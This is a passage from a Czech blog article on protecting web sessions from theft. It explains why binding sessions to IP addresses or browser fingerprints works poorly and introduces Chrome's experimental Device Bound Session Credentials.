Tento článek sice nemá být kompletním návodem na (obranu proti) kradení sessions, ale dokážu si představit, že i přesto vás napadne několik Zaručené Dobrých Nápadů™️, jak takovým únosům zabránit.

Již mnoho let takovým klasickým nápadem bývá „přilepení“ sessions jen ke konkrétní IP adrese a z jiné, např. útočníkovo, se i při znalosti session id do té sessiony dostat přece nepůjde. To zní skvěle do té doby, než si uvědomíme jak často říkáme „musím jít, to dodělám doma/na chatě/v kavárně“, nebo že naše kancelář má vlastně několik připojení do Internetu, které se na první pohled náhodně přepínají.

Všechno uvedené má za následek, že se IP adresa mění častěji, než by se na první pohled mohlo zdát, což by způsobovalo příliš časté odhlašování a hlavně přihlašování, a tím značné snížení použitelnosti. Nedoporučuji.

Tak tu sessionu navážeme třeba na verzi prohlížeče! Dobrej nápad, jen teda verze prohlížeče samotná není moc unikátní a navíc se mění při každé aktualizaci. Tak si browser nějak označíme, nějakým dalším identifikátorem, nebo otiskem, fingerprintem. Jasně, akorát teda ten fingerprint asi uložíme do cookie, která… se taky zobrazí v phpinfo().

Tak budeme ten fingerprint zjišťovat při každém požadavku automaticky, třeba pomocí JavaScriptu! Zajímavé, ale předpokladem je, že útočník si na stránce taky může spustit vlastní JavaScript, který ten fingerprint zjistí stejně jako ten váš JavaScript, nehledě na to, že browsery se takové sledování uživatelů snaží do jisté míry eliminovat.

Možná by to tedy chtělo nějaké moderní systémové řešení, ne jako náhradu cenzury phpinfo() popisované výše, ale spíš jako doplněk. Hmm, a co takhle třeba:

Device Bound Session Credentials

Kradení cookies ale možná bude velmi brzy již minulostí, Chrome totiž experimentuje s něčím, co nazývají Device Bound Session Credentials. To by mělo zajistit, že sessiona bude svázaná s konkrétním zařízením, používají k tomu veřejné a soukromé klíče a TPM pro jejich uložení. Mělo by to také fungovat jako jakási nadstavba nad klasickými sessions, nemělo by to vyžadovat nějaké brutální změny všeho možného.

Prototyp tohoto řešení už chrání některé Google účty pokud uživatelé používají Chrome Beta a do konce roku 2024 by Device Bound Session Credentials na zkoušku měly být dostupné i veřejnosti a dalším webům jako tzv. Origin Trials.